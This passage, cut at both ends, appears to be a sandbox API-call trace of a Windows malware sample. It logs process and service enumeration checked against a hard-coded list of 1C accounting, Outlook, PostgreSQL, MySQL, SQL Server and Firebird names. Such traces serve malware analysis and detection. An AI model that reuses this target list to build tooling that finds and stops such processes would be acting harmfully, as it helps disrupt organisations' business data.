(lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0263.324] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0263.324] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0263.324] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0263.324] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.324] lstrlenW (lpString="svchost.exe") returned 11 [0263.324] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0263.324] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0263.324] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0263.325] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0263.325] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0263.325] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0263.325] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0263.325] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.325] lstrlenW (lpString="svchost.exe") returned 11 [0263.325] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0263.325] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0263.325] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0263.325] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0263.325] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0263.325] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0263.325] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0263.325] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.325] lstrlenW (lpString="svchost.exe") returned 11 [0263.325] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0263.325] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0263.325] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0263.326] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0263.326] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0263.326] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0263.326] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0263.326] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0263.326] lstrlenW (lpString="audiodg.exe") returned 11 [0263.326] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0263.326] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0263.326] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0263.326] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0263.326] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0263.326] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0263.326] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0263.326] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.326] lstrlenW (lpString="svchost.exe") returned 11 [0263.326] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0263.326] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0263.326] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0263.326] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0263.327] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0263.327] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0263.327] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0263.327] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0263.327] lstrlenW (lpString="userinit.exe") returned 12 [0263.327] lstrcmpiW (lpString1="1c8.exe", lpString2="userinit.exe") returned -1 [0263.327] lstrcmpiW (lpString1="1cv77.exe", lpString2="userinit.exe") returned -1 [0263.327] lstrcmpiW (lpString1="outlook.exe", lpString2="userinit.exe") returned -1 [0263.327] lstrcmpiW (lpString1="postgres.exe", lpString2="userinit.exe") returned -1 [0263.327] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="userinit.exe") returned -1 [0263.327] lstrcmpiW (lpString1="mysqld.exe", lpString2="userinit.exe") returned -1 [0263.327] lstrcmpiW (lpString1="sqlservr.exe", lpString2="userinit.exe") returned -1 [0263.327] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x378, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.327] lstrlenW (lpString="explorer.exe") returned 12 [0263.327] lstrcmpiW (lpString1="1c8.exe", lpString2="explorer.exe") returned -1 [0263.327] lstrcmpiW (lpString1="1cv77.exe", lpString2="explorer.exe") returned -1 [0263.327] lstrcmpiW (lpString1="outlook.exe", lpString2="explorer.exe") returned 1 [0263.327] lstrcmpiW (lpString1="postgres.exe", lpString2="explorer.exe") returned 1 [0263.328] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="explorer.exe") returned 1 [0263.328] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x420, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0263.328] lstrlenW (lpString="dwm.exe") returned 7 [0263.328] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.328] lstrlenW (lpString="svchost.exe") returned 11 [0263.328] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0263.329] lstrlenW (lpString="agent1c.exe") returned 11 [0263.329] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0263.329] lstrlenW (lpString="spoolsv.exe") returned 11 [0263.329] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0263.329] lstrlenW (lpString="reader_sl.exe") returned 13 [0263.329] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0263.329] lstrlenW (lpString="dllhost.exe") returned 11 [0263.329] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0263.330] lstrlenW (lpString="taskhost.exe") returned 12 [0263.330] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.330] lstrlenW (lpString="svchost.exe") returned 11 [0263.330] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0263.330] lstrlenW (lpString="cmd.exe") returned 7 [0263.330] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x628, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0263.331] lstrlenW (lpString="conhost.exe") returned 11 [0263.331] Process32NextW (in: hSnapshot=0x134, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x628, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0263.331] CloseHandle (hObject=0x134) returned 1 [0263.331] Sleep (dwMilliseconds=0x1f4) [0264.301] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4d9e18 [0264.461] EnumServicesStatusExW (in: hSCManager=0x4d9e18, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 0 [0264.462] GetLastError () returned 0xea [0264.462] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa08) returned 0x565e68 [0264.462] EnumServicesStatusExW (in: hSCManager=0x4d9e18, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x565e68, cbBufSize=0xa08, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x565e68, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 1 [0264.463] CloseServiceHandle (hSCObject=0x4d9e18) returned 1 [0264.463] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0264.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0264.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0264.463] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0264.463] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0264.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0264.463] lstrlenW (lpString="AudioSrv") returned 8 [0264.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0264.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0264.463] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0264.463] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0264.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0264.463] lstrlenW (lpString="BFE") returned 3 [0264.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0264.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0264.463] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0264.463] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0264.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0264.463] lstrlenW (lpString="CscService") returned 10 [0264.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0264.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0264.464] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0264.464] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0264.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0264.464] lstrlenW (lpString="DcomLaunch") returned 10 [0264.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0264.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0264.464] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0264.464] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0264.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0264.464] lstrlenW (lpString="Dhcp") returned 4 [0264.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0264.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0264.464] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0264.464] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0264.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0264.464] lstrlenW (lpString="Dnscache") returned 8 [0264.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0264.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0264.464] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0264.464] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0264.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0264.464] lstrlenW (lpString="eventlog") returned 8 [0264.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0264.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0264.464] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0264.464] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0264.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0264.464] lstrlenW (lpString="EventSystem") returned 11 [0264.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0264.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0264.464] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0264.464] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0264.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0264.464] lstrlenW (lpString="gpsvc") returned 5 [0264.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0264.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0264.464] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0264.464] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0264.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0264.465] lstrlenW (lpString="lmhosts") returned 7 [0264.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0264.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0264.465] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0264.465] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0264.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0264.465] lstrlenW (lpString="MMCSS") returned 5 [0264.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0264.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0264.465] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0264.465] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0264.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0264.465] lstrlenW (lpString="nsi") returned 3 [0264.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0264.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0264.465] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0264.465] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0264.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0264.465] lstrlenW (lpString="PlugPlay") returned 8 [0264.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0264.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0264.465] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0264.465] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0264.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0264.465] lstrlenW (lpString="Power") returned 5 [0264.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0264.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0264.465] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0264.465] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0264.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0264.465] lstrlenW (lpString="ProfSvc") returned 7 [0264.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0264.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0264.465] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0264.465] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0264.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0264.465] lstrlenW (lpString="RpcEptMapper") returned 12 [0264.466] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0264.466] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0264.466] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0264.466] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0264.466] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0264.466] lstrlenW (lpString="RpcSs") returned 5 [0264.466] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0264.466] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0264.466] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0264.466] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0264.466] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0264.466] lstrlenW (lpString="SamSs") returned 5 [0264.466] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0264.466] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0264.466] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0264.466] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0264.466] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0264.466] lstrlenW (lpString="Schedule") returned 8 [0264.466] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0264.466] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0264.466] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0264.466] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0264.466] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0264.466] lstrlenW (lpString="SENS") returned 4 [0264.466] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0264.466] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0264.466] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0264.466] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0264.466] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0264.466] lstrlenW (lpString="ShellHWDetection") returned 16 [0264.466] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0264.466] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0264.466] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0264.466] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0264.466] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0264.466] lstrlenW (lpString="Spooler") returned 7 [0264.466] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0264.466] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0264.467] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0264.467] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0264.467] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0264.467] lstrlenW (lpString="Themes") returned 6 [0264.467] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0264.467] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0264.467] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0264.467] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0264.467] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0264.467] lstrlenW (lpString="UxSms") returned 5 [0264.467] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0264.467] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0264.467] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0264.467] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0264.467] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0264.467] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x565e68 | out: hHeap=0x4a0000) returned 1 [0264.467] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x130 [0264.468] Process32FirstW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.468] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x48, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0264.469] lstrlenW (lpString="System") returned 6 [0264.469] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0264.469] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0264.469] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0264.469] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0264.469] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0264.469] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0264.469] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0264.469] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0264.469] lstrlenW (lpString="smss.exe") returned 8 [0264.469] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0264.469] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0264.469] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0264.469] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0264.469] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0264.469] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0264.469] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0264.469] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0264.470] lstrlenW (lpString="csrss.exe") returned 9 [0264.470] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0264.470] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0264.470] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0264.470] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0264.470] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0264.470] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 